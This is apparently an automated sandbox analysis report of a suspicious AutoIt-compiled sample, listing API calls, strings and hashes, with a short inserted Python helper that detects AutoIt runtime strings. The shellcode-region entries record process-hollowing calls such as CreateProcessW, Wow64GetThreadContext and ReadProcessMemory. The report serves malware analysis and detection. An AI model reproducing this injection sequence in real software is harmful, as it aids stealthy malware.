                                                        • API String ID: 2914291525-1005189915
                                                        • Opcode ID: 8f69357ad4fd7de76c78bba9f685936345070209800999283baa0b23664e753e
                                                        • Instruction ID: 4440f0663549e4d62e3da2fdffcae7bb40582d53fb7b12173dce245a48cd956c
                                                        • Opcode Fuzzy Hash: 8f69357ad4fd7de76c78bba9f685936345070209800999283baa0b23664e753e
                                                        • Instruction Fuzzy Hash: 5F317A71801348AFDB50DFA4DC84A9DBFF0FB09310F24456EE480E62A0D7B91599CF69

                                                        Control-flow Graph

                                                        APIs
                                                        • GetSysColorBrush.USER32(0000000F), ref: 00403074
                                                        • RegisterClassExW.USER32(00000030), ref: 0040309E
                                                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004030AF
                                                        • InitCommonControlsEx.COMCTL32(?), ref: 004030CC
                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 004030DC
                                                        • LoadIconW.USER32(000000A9), ref: 004030F2
                                                        • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00403101
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                        • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                        • API String ID: 2914291525-1005189915
                                                        • Opcode ID: 1851e2fbc18e2f99d75288993840a6d640a6fda4d586a764550e5d38fc6b7f12
                                                        • Instruction ID: 5f72cbcfe52bedf9aac6cae92f5874e6cc1455117f94183018d2e1bba946cea4
                                                        • Opcode Fuzzy Hash: 1851e2fbc18e2f99d75288993840a6d640a6fda4d586a764550e5d38fc6b7f12
                                                        • Instruction Fuzzy Hash: DD21F9B1911208AFEB40EF94EC48B9DBBF4FB08700F10453AF511A62A0D7B555948FA9

                                                        Control-flow Graph
                                                        • Rendered as an image on the original page (legend: Executed / Not Executed); the graph data is not reproduced here.
                                                        • Function 0040708B, basic blocks 0040708B to 0043EA1D; API calls reached from the graph: RegOpenKeyExW, RegQueryValueExW, RegCloseKey.
                                                        APIs
                                                          • Part of subcall function 00404706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,004C52F8,?,004037AE,?), ref: 00404724
                                                          • Part of subcall function 0042050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00407165), ref: 0042052D
                                                        • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 004071A8
                                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0043E8C8
                                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0043E909
                                                        • RegCloseKey.ADVAPI32(?), ref: 0043E947
                                                        • _wcscat.LIBCMT ref: 0043E9A0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                        • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                        • API String ID: 2673923337-2727554177
                                                        • Opcode ID: 27bc7da5b5cd50995d28b92ffe80513406b54d2bc234f3195dcea08f44c465d6
                                                        • Instruction ID: d25a402f486e77f999364444344266e14871576642d40cf04fb282302ec68e46
                                                        • Opcode Fuzzy Hash: 27bc7da5b5cd50995d28b92ffe80513406b54d2bc234f3195dcea08f44c465d6
                                                        • Instruction Fuzzy Hash: E9718E71509301AEC340EF26E841D5BBBE8FF88314F51893FF445972A1DB79A948CB5A
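                                                        The two GUI-registration entries above pass the window class "AutoIt v3 GUI" to RegisterClassExW, and the entry just above opens HKCU (hKey 80000001) \Software\AutoIt v3\AutoIt with KEY_QUERY_VALUE (00000001) and reads its Include value; together these are the embedded AutoIt v3 interpreter doing its normal start-up. A quick way to confirm that identification on another sample or memory dump is to look for those strings in the encoding the W-suffixed APIs imply. The following Python is an added triage helper, not code from the Joe Sandbox report or from AutoIt; the bytes it scans are constructed inline, and the helper names (find_strings, looks_like_autoit_runtime, build_sample, scan_file) are assumptions made for the example.

```python
"""Triage helper: confirm the AutoIt v3 runtime strings seen in the listing.

Added example, not code from the report or from AutoIt.  The strings are
arguments to wide-char APIs (RegisterClassExW, RegOpenKeyExW), so the binary
stores them UTF-16LE; an ASCII grep for "AutoIt v3" misses them.
"""
from typing import Dict, List, Sequence

# Strings taken from the String ID fields of the GUI-registration and
# registry-lookup functions in the listing.
AUTOIT_MARKERS: Sequence[str] = (
    "AutoIt v3 GUI",                # window class passed to RegisterClassExW
    "Software\\AutoIt v3\\AutoIt",  # HKCU key opened with RegOpenKeyExW
)


def find_strings(blob: bytes, markers: Sequence[str],
                 encoding: str = "utf-16-le") -> Dict[str, List[int]]:
    """Return {marker: [offsets]} for every marker found in blob under encoding.

    Markers with no hit are omitted, so the result doubles as a presence test.
    """
    hits: Dict[str, List[int]] = {}
    for marker in markers:
        needle = marker.encode(encoding)
        offsets: List[int] = []
        pos = blob.find(needle)
        while pos != -1:
            offsets.append(pos)
            pos = blob.find(needle, pos + 1)
        if offsets:
            hits[marker] = offsets
    return hits


def looks_like_autoit_runtime(blob: bytes) -> bool:
    """True when both runtime markers are present as UTF-16LE strings."""
    return len(find_strings(blob, AUTOIT_MARKERS)) == len(AUTOIT_MARKERS)


def build_sample() -> bytes:
    """Constructed stand-in for a dump (not the real sample): an MZ stub, the
    two markers stored the way the runtime stores them (UTF-16LE, NUL
    terminated) and one ASCII copy of the class name as a decoy."""
    def wide(s: str) -> bytes:
        return s.encode("utf-16-le") + b"\x00\x00"

    return (b"MZ" + b"\x00" * 62                    # offsets   0.. 63
            + wide("AutoIt v3 GUI")                  # offsets  64.. 91
            + b"\x90" * 16                           # offsets  92..107
            + b"AutoIt v3 GUI"                       # offsets 108..120 (ASCII decoy)
            + wide("Software\\AutoIt v3\\AutoIt"))   # offsets 121..172


def scan_file(path: str) -> Dict[str, List[int]]:
    """Scan a PE or memory dump on disk (e.g. an .sdmp file) for the markers."""
    with open(path, "rb") as fh:
        return find_strings(fh.read(), AUTOIT_MARKERS)


if __name__ == "__main__":
    sample = build_sample()
    print("utf-16-le:", find_strings(sample, AUTOIT_MARKERS))
    print("ascii:    ", find_strings(sample, AUTOIT_MARKERS, "ascii"))
    print("AutoIt runtime:", looks_like_autoit_runtime(sample))
```

                                                        Run against the constructed sample, the UTF-16LE pass finds both markers and the ASCII pass finds only the decoy, which is the point: when the listing shows a string as an argument to a ...W API, search for it as UTF-16LE. scan_file takes the same approach to a dump on disk; a hit on both markers is consistent with the "compiled AutoIt script" signature but is not on its own proof that the script is malicious, since any AutoIt-built program carries them.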

                                                        Control-flow Graph
                                                        • Rendered as an image on the original page (legend: Executed / Not Executed); the graph data is not reproduced here.
                                                        • Function 00403633, basic blocks 00403633 to 0043D16E; API calls reached from the graph: DefWindowProcW, KillTimer, SetTimer, RegisterWindowMessageW, CreatePopupMenu, PostQuitMessage, MoveWindow, SetFocus.
                                                        APIs
                                                        • DefWindowProcW.USER32(?,?,?,?), ref: 004036D2
                                                        • KillTimer.USER32(?,00000001), ref: 004036FC
                                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0040371F
                                                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0040372A
                                                        • CreatePopupMenu.USER32 ref: 0040373E
                                                        • PostQuitMessage.USER32(00000000), ref: 0040374D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                        • String ID: TaskbarCreated$%I
                                                        • API String ID: 129472671-1195164674
                                                        • Opcode ID: 966edbd5f2e312d4ba3a9f2ebc71c219dc323684879314e6e103aa33e8c5c9c6
                                                        • Instruction ID: dec945db719cbeb7d7ffc5e313a4f07f26295059660cff28048481092df75402
                                                        • Opcode Fuzzy Hash: 966edbd5f2e312d4ba3a9f2ebc71c219dc323684879314e6e103aa33e8c5c9c6
                                                        • Instruction Fuzzy Hash: F34127B1110505ABDB246F68EC09F7E3E98EB44302F50453BF602A63E1C67EAD95972E

                                                        Control-flow Graph

                                                        APIs
                                                        • GetSysColorBrush.USER32(0000000F), ref: 00403A50
                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 00403A5F
                                                        • LoadIconW.USER32(00000063), ref: 00403A76
                                                        • LoadIconW.USER32(000000A4), ref: 00403A88
                                                        • LoadIconW.USER32(000000A2), ref: 00403A9A
                                                        • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00403AC0
                                                        • RegisterClassExW.USER32(?), ref: 00403B16
                                                          • Part of subcall function 00403041: GetSysColorBrush.USER32(0000000F), ref: 00403074
                                                          • Part of subcall function 00403041: RegisterClassExW.USER32(00000030), ref: 0040309E
                                                          • Part of subcall function 00403041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004030AF
                                                          • Part of subcall function 00403041: InitCommonControlsEx.COMCTL32(?), ref: 004030CC
                                                          • Part of subcall function 00403041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 004030DC
                                                          • Part of subcall function 00403041: LoadIconW.USER32(000000A9), ref: 004030F2
                                                          • Part of subcall function 00403041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00403101
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                        • String ID: #$0$AutoIt v3
                                                        • API String ID: 423443420-4155596026
                                                        • Opcode ID: e93e5f7a6ad55884e62165224cde73996e1a183fbeab7dcf433d053beda00650
                                                        • Instruction ID: 95199bfa57b98a40bbf2a31e3c8143aaf86e5cd3d1ec7ed5ae4cf298cf618104
                                                        • Opcode Fuzzy Hash: e93e5f7a6ad55884e62165224cde73996e1a183fbeab7dcf433d053beda00650
                                                        • Instruction Fuzzy Hash: C4214874D00308AFEB50DFA4EC09F9D7BF4FB08711F1045BAE500A62A1D3B966948F88
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1287711947.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1670000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c9358735c024d8eee74632e46bbc21edd5feaa21ee39b106b4db2eedbc690e5f
                                                        • Instruction ID: c74a3ddb5d69d01d8fc7c03bafa40060b60c693c452f163e65241e5aceeb7dfd
                                                        • Opcode Fuzzy Hash: c9358735c024d8eee74632e46bbc21edd5feaa21ee39b106b4db2eedbc690e5f
                                                        • Instruction Fuzzy Hash: BCA279719093818BD736CB9CCC447AABBE1AFC5318F098E5DE59897392D335A804CB97

                                                        Control-flow Graph

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                                        • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW$RL
                                                        • API String ID: 1825951767-3937808951
                                                        • Opcode ID: 55abaa5f9173c571b393e83cff65ceb46aa81888e6227bb4e8d9032cc79dbeb6
                                                        • Instruction ID: 217e4a9907ead401ca9bb1711b2953d037e75f133ca24ff269f2dfb0051b1760
                                                        • Opcode Fuzzy Hash: 55abaa5f9173c571b393e83cff65ceb46aa81888e6227bb4e8d9032cc79dbeb6
                                                        • Instruction Fuzzy Hash: DAA13CB29102199ACB04EFA1DC91EEEBB78BF14314F40053FE415B7191DB786A08CBA9

                                                        Control-flow Graph

                                                        APIs
                                                          • Part of subcall function 00420162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00420193
                                                          • Part of subcall function 00420162: MapVirtualKeyW.USER32(00000010,00000000), ref: 0042019B
                                                          • Part of subcall function 00420162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 004201A6
                                                          • Part of subcall function 00420162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 004201B1
                                                          • Part of subcall function 00420162: MapVirtualKeyW.USER32(00000011,00000000), ref: 004201B9
                                                          • Part of subcall function 00420162: MapVirtualKeyW.USER32(00000012,00000000), ref: 004201C1
                                                          • Part of subcall function 004160F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,0040F930), ref: 00416154
                                                        • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0040F9CD
                                                        • OleInitialize.OLE32(00000000), ref: 0040FA4A
                                                        • CloseHandle.KERNEL32(00000000), ref: 004445C8
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                        • String ID: <WL$\TL$%I$SL
                                                        • API String ID: 1986988660-4199584472
                                                        • Opcode ID: 66b0d841d80f60ddd55c2de4cf445b91ea5cd604cc27ef35133c2a6073eab96b
                                                        • Instruction ID: cacde0f204b6a9090d7281a683cdea215049a4593ae0d5a2ec8f4d386ae10ecf
                                                        • Opcode Fuzzy Hash: 66b0d841d80f60ddd55c2de4cf445b91ea5cd604cc27ef35133c2a6073eab96b
                                                        • Instruction Fuzzy Hash: 6581ADB4901A809EC3C8EF3AA944F5D7BE5AB9830A790853F9419C7272E77874C58F1D

                                                        Control-flow Graph

                                                        • Control-flow graph (rendered image not reproduced): basic blocks b655c8 through b658ca, calling CreateFileW, VirtualAlloc, ReadFile, CloseHandle and VirtualFree, with subcalls to b62fc8, b664d8, b66728 and b66538; executed and not-executed blocks were colour-coded in the original rendering.
                                                        APIs
                                                        • CreateFileW.KERNEL32(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 00B65699
                                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00B658BF
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1287269734.0000000000B62000.00000040.00000020.00020000.00000000.sdmp, Offset: 00B62000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_b62000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: CreateFileFreeVirtual
                                                        • String ID:
                                                        • API String ID: 204039940-0
                                                        • Opcode ID: c604c45430315f2d7ac9edfc96fa3ed3524b16f7139e20e6f85f26396c7b052c
                                                        • Instruction ID: fbe5b0503ae7f27bfbd74396c4c08c9e80f3bb71995ea8f4f91b951120626797
                                                        • Opcode Fuzzy Hash: c604c45430315f2d7ac9edfc96fa3ed3524b16f7139e20e6f85f26396c7b052c
                                                        • Instruction Fuzzy Hash: 4DA10774E00609EBDB24CFA4C898BEEBBB5FF48305F208599E505BB280D7799E51CB54

                                                        Control-flow Graph

                                                        • Control-flow graph (rendered image not reproduced): a single basic block 4039d5-403a45 calling CreateWindowExW twice and ShowWindow twice; executed and not-executed blocks were colour-coded in the original rendering.
                                                        APIs
                                                        • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00403A03
                                                        • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00403A24
                                                        • ShowWindow.USER32(00000000,?,?), ref: 00403A38
                                                        • ShowWindow.USER32(00000000,?,?), ref: 00403A41
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Window$CreateShow
                                                        • String ID: AutoIt v3$edit
                                                        • API String ID: 1584632944-3779509399
                                                        • Opcode ID: 63781ed4ae1f3443bb25091dad28ecbd1b84819009c2b11518bfb31f136976a9
                                                        • Instruction ID: be7595edf0713681b26590b93805f6b8ae52c85786ba9eb407d90bea5093dcab
                                                        • Opcode Fuzzy Hash: 63781ed4ae1f3443bb25091dad28ecbd1b84819009c2b11518bfb31f136976a9
                                                        • Instruction Fuzzy Hash: 5DF03A705002907EEB705723AC48E2F2EBDD7C6F50B00407EB900E2170C2752881CEB8

                                                        Control-flow Graph

                                                        • Control-flow graph (rendered image not reproduced): basic blocks b65378 through b6557e, calling CreateFileW, VirtualAlloc, ReadFile and ExitProcess, with subcalls to b62fc8, b65268, b652a8, b64268 and b652f8; executed and not-executed blocks were colour-coded in the original rendering.
                                                        APIs
                                                          • Part of subcall function 00B65268: Sleep.KERNEL32(000001F4), ref: 00B65279
                                                        • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00B654B8
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1287269734.0000000000B62000.00000040.00000020.00020000.00000000.sdmp, Offset: 00B62000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_b62000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: CreateFileSleep
                                                        • String ID: J3EPKQ8O28TT1U692APD3SA1HY
                                                        • API String ID: 2694422964-2513293158
                                                        • Opcode ID: 743b2e8f030bef22c5e3506cf72cabdff9867a2912651af369ffd27054586d60
                                                        • Instruction ID: bb1ef3e603be236aadb948e1c33306e07bae0e73f5acd6c9ab4f65978e8abda5
                                                        • Opcode Fuzzy Hash: 743b2e8f030bef22c5e3506cf72cabdff9867a2912651af369ffd27054586d60
                                                        • Instruction Fuzzy Hash: 65618130D04288EAEF11DBB4C858BEEBBB99F15304F044199E2497B2C1D7B91B49CBA5

                                                        Control-flow Graph

                                                        • Control-flow graph (rendered image not reproduced): basic blocks 40407c through 40417d plus out-of-line blocks 43d3c8 through 43d41e, calling LoadStringW and Shell_NotifyIconW, with subcalls to 407a16, 407bcc, 407b2e, 406fe3, 407cab, 422de0, 40454e, 422dbc, 405904 and 408047; executed and not-executed blocks were colour-coded in the original rendering.
                                                        APIs
                                                        • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0043D3D7
                                                          • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                                        • _memset.LIBCMT ref: 004040FC
                                                        • _wcscpy.LIBCMT ref: 00404150
                                                        • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00404160
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                        • String ID: Line:
                                                        • API String ID: 3942752672-1585850449
                                                        • Opcode ID: 7c919a651244d8191c8cc595b031c7aba535162d9cd3fbc7f9b82a5c1c0bd2c8
                                                        • Instruction ID: 5bc5e1414a994c2bc470de53771d73d2d6dd5f3f474fa0ef1b1349c24bbf7672
                                                        • Opcode Fuzzy Hash: 7c919a651244d8191c8cc595b031c7aba535162d9cd3fbc7f9b82a5c1c0bd2c8
                                                        • Instruction Fuzzy Hash: 0C31A0B1408305AAD360EB61DC45FDF77E8AB84308F10493FB685A21D1DB78A649CB9F
                                                        APIs
                                                        • CreateProcessW.KERNEL32(?,00000000), ref: 00B64A23
                                                        • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00B64AB9
                                                        • ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00B64ADB
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1287269734.0000000000B62000.00000040.00000020.00020000.00000000.sdmp, Offset: 00B62000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_b62000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                        • String ID:
                                                        • API String ID: 2438371351-0
                                                        • Opcode ID: 0b43d72d38ac188f5e361c01a6572487286e397564ea08694eb873f1bb21aafa
                                                        • Instruction ID: 82f9a5158bb22a3c63f430dd9228beebe116678a62fa181b8a890040e0be64e1
                                                        • Opcode Fuzzy Hash: 0b43d72d38ac188f5e361c01a6572487286e397564ea08694eb873f1bb21aafa
                                                        • Instruction Fuzzy Hash: F562E930A146589BEB24CFA4C851BDEB376FF58300F1091A9D10DEB390E77A9E81CB59
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                        • String ID:
                                                        • API String ID: 1559183368-0
                                                        • Opcode ID: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
                                                        • Instruction ID: c535a9b74c3be08fb66675131960c2e3f57dfdec9721024cad96d7a05cd33cf3
                                                        • Opcode Fuzzy Hash: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
                                                        • Instruction Fuzzy Hash: 9051BB30B00B15EBCB149E65F84066FB7B2AF40325F94472FF825963D4D7789D918B49
                                                        APIs
